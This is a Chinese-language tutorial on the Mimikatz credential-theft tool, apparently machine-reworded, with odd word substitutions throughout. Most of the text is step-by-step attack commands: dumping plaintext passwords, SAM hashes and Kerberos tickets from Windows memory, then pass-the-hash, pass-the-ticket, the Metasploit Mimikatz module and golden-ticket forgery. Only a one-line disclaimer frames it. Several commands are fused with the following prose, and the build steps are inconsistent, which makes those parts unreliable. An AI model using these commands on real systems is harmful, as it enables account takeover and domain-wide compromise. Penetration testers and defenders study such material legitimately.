Mimikatz:无敌密码抓取、内存凭证提取工具
Mimikatz 是一款著名开源工具,广泛用于渗透测试、红队操作中,它最先选用于从Windows系统中提取凭证、密码哈希以及执行各类保障测试操作,本文将祥明介绍Mimikatz功能、安装、运用过程,让你能够百分之百利用这款无敌工具,
什么是Mimikatz?
Mimikatz 是由Benjamin Delpy开发开源工具,功能无敌,能够从Windows系统中提取明文密码、Kerberos票据、密码哈希等敏感信息,Mimikatz不光在渗透测试中广泛应用,也是保障研究、防御要紧参考工具,
Mimikatz最先选特点
- 提取明文密码:从系统内存中提取明文密码,
- 提取哈希值:提取NTLM、Kerberos哈希值,用于后续攻击,
- 操作票据:创建、导入、导出Kerberos票据,实行票据传递攻击〔Pass-the-Ticket〕,
- 凭证转储:转储LSA秘密、SAM数据库等敏感信息,
- 各类攻击组合:持助Pass-the-Hash、Pass-the-Ticket、Overpass-the-Hash等攻击技术,
- 广泛兼容性:持助多种Windows版本,从Windows XP到最新Windows 10,
安装Mimikatz
步骤 1:下载Mimikatz
Mimikatz可以从其GitHub仓库下载,访问Mimikatz GitHub页面并下载最新发行版本,
git clone https://github.com/gentilkiwi/mimikatz.git或者直接下载预编译二进制文件,
步骤 2:编译Mimikatz〔可选〕
倘若你选择下载源码并自行编译,可以运用以下命令:
cd mimikatz/mimikatzmake
步骤 3:准备环境
确保你系统上安装Visual Studio或其他必需编译工具,这样可以顺利编译Mimikatz,
运用Mimikatz实行密码抓取
接下来,咱们将经由几個祥明示例展示如何运用Mimikatz实行密码抓取、凭证提取,
示例:提取明文密码
步骤 1:运行Mimikatz
打开命令行窗口,领航到Mimikatz目录,而后运行Mimikatz:
mimikatz.exe
步骤 2:启用调试权限
在Mimikatz控制台中输入以下命令,启用调试权限:
privilege::debug
步骤 3:提取明文密码
运用以下命令从系统中提取明文密码:
sekurlsa::logonpasswordsMimikatz
将列出当前系统中所有登录运用者明文密码、哈希值、其他凭证信息,
示例:提取NTLM、Kerberos哈希
步骤 1:提取NTLM哈希
在Mimikatz控制台中输入以下命令,提取NTLM哈希:
lsadump::samMimikatz将显示系统中所有运用者NTLM哈希,
步骤 2:提取Kerberos票据
运用以下命令提取Kerberos票据:
sekurlsa::ticketsMimikatz将列出所有已缓存Kerberos票据,
示例:执行Pass-the-Hash攻击
步骤 1:运用NTLM哈希实行身份验证
假设你已经捕获到一個运用者NTLM哈希,可以运用以下命令实行Pass-the-Hash攻击:
sekurlsa::pth /user:Administrator /domain:MYDOMAIN /ntlm:HASH_VALUE /run:cmd.exe将HASH_VALUE替换为实际NTLM哈希值,Mimikatz将启动一個新命令行窗口,其中具有意向运用者身份,
示例:执行Pass-the-Ticket攻击
步骤 1:导出Kerberos票据
在Mimikatz控制台中输入以下命令,导出一個Kerberos票据:
kerberos::list /exportMimikatz将导出所有Kerberos票据并保存到当前目录,
步骤 2:导入Kerberos票据
在意向系统中运行Mimikatz,并运用以下命令导入票据:
kerberos::ptt TICKET_FILENAME将TICKET_FILENAME替换为实际票据文件名,Mimikatz将导入票据,并允许你以票据持有者身份实行操作,
Mimikatz高级运用
集成Mimikatz与Metasploit
Mimikatz可以与Metasploit框架集成,实行更加复杂、全面攻击,
步骤 1:在Metasploit中加载Mimikatz
在Metasploit控制台中,运用以下命令加载Mimikatz:
use post/windows/gather/credentials/mimikatz
步骤 2:配置意向
设置意向系统相关参数,比方说会话ID:
set SESSION 1
步骤 3:执行Mimikatz模块
运用以下命令执行Mimikatz模块:
runMetasploit将自动运行Mimikatz并捕获意向系统中凭证信息,
运用Mimikatz实行黄金票据攻击
黄金票据攻击〔Golden Ticket Attack〕是一种高级Kerberos攻击技术,运用伪造TGT〔Ticket Granting Ticket〕访问系统资源,
步骤 1:获取域名、SID、KRBTGT哈希
在域控制器上运行Mimikatz,获取域名、域SID、KRBTGT运用者NTLM哈希:
privilege::debuglsadump::lsa /inject /name:krbtgtdomain::sid
步骤 2:生成黄金票据
运用以下命令生成黄金票据:kerberos::golden /user:Administrator /domain:mydomain.com /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:KRBTGT_HASH /id:500
将相关参数替换为实际值,Mimikatz将生成一個黄金票据,
步骤 3:导入黄金票据
运用以下命令导入黄金票据:
kerberos::ptt golden.kirbi现在,你可以以意向运用者身份访问域内资源,
结语
Mimikatz凭借其无敌密码抓取、内存凭证提取功能,变成渗透测试、红队行动要紧工具,经由本文祥明介绍,你应该已经解如何安装、运用Mimikatz实行密码抓取、凭证提取,任凭你是保障研究员、渗透测试员,还是红队成员,掌握Mimikatz运用技巧都将极大提升你网络保障本事。赶快在你渗透测试中试试Mimikatz吧!
本文仅作技术共享 切勿用于非法途径